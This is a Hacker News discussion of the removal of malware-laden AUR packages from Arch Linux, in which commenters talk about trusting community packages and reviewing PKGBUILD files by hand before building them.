Arch Linux pulls AUR packages that installed Chaos RAT malware

https://www.bleepingcomputer.com/news/security/arch-linux-pulls-aur-packages-that-installed-chaos-rat-malware/

10•mikece•6mo ago

Comments

lr0•6mo ago

I remember when I was using Arch around 5 years ago and I was looking for the Brave browser package, when I found it could be only be installed through the AUR, for some reason I had the assumption that since it's hosted on Arch's official servers it must be properly reviewed even if it was built by the community (like how Chrome web extensions are, for example). And I installed so many AUR packages for things that I used to manually install or find a workaround to install their .deb file on my Arch (using dpkg[0] for example). Then, I was in IRC and I found two fellows talking about "trusting" the AUR, and you can imagine the rest. I started an AUR-detox.

Before moving totally from Arch I kept some AUR packages that I could not let go of, but on the condition of checking their scripts thoroughly and making sure to check them even more thoroughly with each update, and only updating them when it's really necessary. I'm not sure if other Linux package repositories (like Nix) have these supply-chain-attack possibilities or if they employ a better review mechanism, but I really hope if Arch maintainers can find a solution to make the AUR safer, at least more than how it currently sounds.

[0]: https://tracker.debian.org/pkg/dpkg

jolmg•6mo ago

This is also why AUR helpers are unofficial and the packages don't come prebuilt. The official way to use the AUR is very manual, precisely to encourage reviewing. You have to download the PKGBUILD and accompanying files manually (git clone, etc.), review the files, then `makepkg`, then `pacman -U`. It's in the wiki article for the AUR:

https://wiki.archlinux.org/title/Arch_User_Repository

It even says:

> 2. Verify that the PKGBUILD and accompanying files are not malicious or untrustworthy.

> but I really hope if Arch maintainers can find a solution to make the AUR safer

Safe packages go on the official repos. The entire point of the AUR is to be a low-friction repo for Arch users to share their packages. A "safe" AUR is to have no AUR and just have the official repos.

I replaced the front page with AI slop and honestly it's an improvement

Economists vs. Technologists on AI

Life at the Edge

RISC-V Vector Primer

Show HN: Invoxo – Invoicing with automatic EU VAT for cross-border services

A Tale of Two Standards, POSIX and Win32 (2005)

Ask HN: Is the Downfall of SaaS Started?

Flirt: The Native Backend

OpenAI's Latest Platform Targets Enterprise Customers

Goldman Sachs taps Anthropic's Claude to automate accounting, compliance roles

Ai.com bought by Crypto.com founder for $70M in biggest-ever website name deal

Big Tech's AI Push Is Costing More Than the Moon Landing

The AI boom is causing shortages everywhere else

Suno, AI Music, and the Bad Future [video]

Ask HN: How are researchers using AlphaFold in 2026?

Running the "Reflections on Trusting Trust" Compiler

Watermark API – $0.01/image, 10x cheaper than Cloudinary

Now send your marketing campaigns directly from ChatGPT

Queueing Theory v2: DORA metrics, queue-of-queues, chi-alpha-beta-sigma notation

Show HN: Hibana – choreography-first protocol safety for Rust

Haniri: A live autonomous world where AI agents survive or collapse

GPT-5.3-Codex System Card [pdf]

Atlas: Manage your database schema as code

Geist Pixel

Show HN: MCP to get latest dependency package and tool versions

The better you get at something, the harder it becomes to do

Show HN: WP Float – Archive WordPress blogs to free static hosting

Show HN: I Hacked My Family's Meal Planning with an App

Sony BMG copy protection rootkit scandal

The Future of Systems